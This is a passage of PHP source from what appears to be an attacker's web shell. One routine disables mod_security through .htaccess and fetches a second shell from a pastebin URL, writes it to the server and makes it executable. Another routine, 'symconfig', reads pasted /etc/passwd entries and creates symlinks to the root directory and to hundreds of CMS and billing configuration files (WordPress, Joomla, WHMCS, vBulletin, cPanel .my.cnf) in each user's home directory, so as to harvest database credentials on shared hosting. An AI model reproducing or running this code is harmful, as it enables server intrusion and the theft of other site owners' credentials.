  723.     $isi_httools7 = "<IfModule mod_security.c>
  724. SecFilterEngine Off
  725. SecFilterScanPOST Off
  726. </IfModule>";
  727.     $httools7 = fopen(".htaccess", "w");
  728.     $tools7_script = file_get_contents("http://pastebin.com/raw.php?i=BRCmf02c");
  729.     $tools7 = fopen($file_tools7, "w");
  730.     fwrite($tools7, $tools7_script);
  731.     fwrite($httools7, $isi_httools7);
  732.     chmod($file_tools7, 0755);
  733.     echo "Done <a href='c7e_tools/noname.php'>Noname Shell Here</a>";
  734. }
  735. elseif($_GET['con7ext'] == 'symconfig') {
  736. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  737. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  738. exit;
  739. }
  740. else
  741. {
  742. if($_POST["m"] && !$_POST["passwd"]==""){
  743. @mkdir("c7e_symconf", 0777);
  744. @chdir("c7e_symconf");
  745. @symlink("/","root");
  746. $htaccess="Options Indexes FollowSymLinks
  747. DirectoryIndex c7eisjustice.htm
  748. AddType text/plain .php
  749. AddHandler text/plain .php
  750. Satisfy Any";
  751. @file_put_contents(".htaccess",$htaccess);
  752. $etc_passwd=$_POST["passwd"];
  753. $etc_passwd=explode("\n",$etc_passwd);
  754. foreach($etc_passwd as $passwd){
  755. $pawd=explode(":",$passwd);
  756. $user =$pawd[0];
  757.  
  758. @symlink('/','c7e_symconf/root');
  759. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  760. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  761. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  762. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  763. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  764. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  765. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  766. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  767. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  768. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  769. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  770. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  771. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  772. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  773. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  774. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  775. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  776. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  777. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  778. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  779. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  780. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  781. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  782. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  783. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  784. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  785. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  786. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  787. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  788. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  789. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  790. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  791. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  792. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  793. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  794. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  795. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  796. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  797. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  798. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  799. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  800. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  801. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  802. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  803. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  804. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  805. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  806. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  807. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  808. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  809. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  810. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  811. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  812. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  813. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  814. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  815. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  816. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  817. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  818. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  819. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  820. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  821. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  860. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  861. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  862. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  863. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  864. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  865. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  866. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  867. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  868. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  869. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  870. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  871. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  872. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  873. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  874. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  875. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  876. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  877. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  878. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  879. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  880. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  881. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  882. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  883. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  884. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  885. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  886. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  887. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  898. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  899. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  900. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  901. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  902. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  903. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  904. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  905. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  906. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  907. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  908. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  909. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  910. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  911. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  912. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  913. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  914. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  915. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  916. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  917. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  918. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  919. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  920. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  921. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  922. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  923. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  924. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  925. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  926. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  927. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  928. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  929. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  930. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  931. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  932. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  933. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  934. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  935. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  936. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  937. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  938. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  939. @symlink('/home/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  940. @symlink('/home/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  941.  
  942. //Home1
  943.  
  944. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  945. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  946. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  947. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  948. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  949. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  950. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  951. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  952. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  953. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  954. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  955. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  956. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  957. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  958. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  959. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  960. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  961. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  962. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  963. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  964. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  965. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  966. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  967. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  968. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  969. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  970. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  971. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  972. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  973. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  974. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  976. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  977. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  978. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  979. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  980. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  981. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  982. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  983. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  984. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  985. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  986. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  987. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  988. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  989. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  990. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  991. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  992. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  993. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  994. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  995. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  996. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  997. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  998. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  999. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1000. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
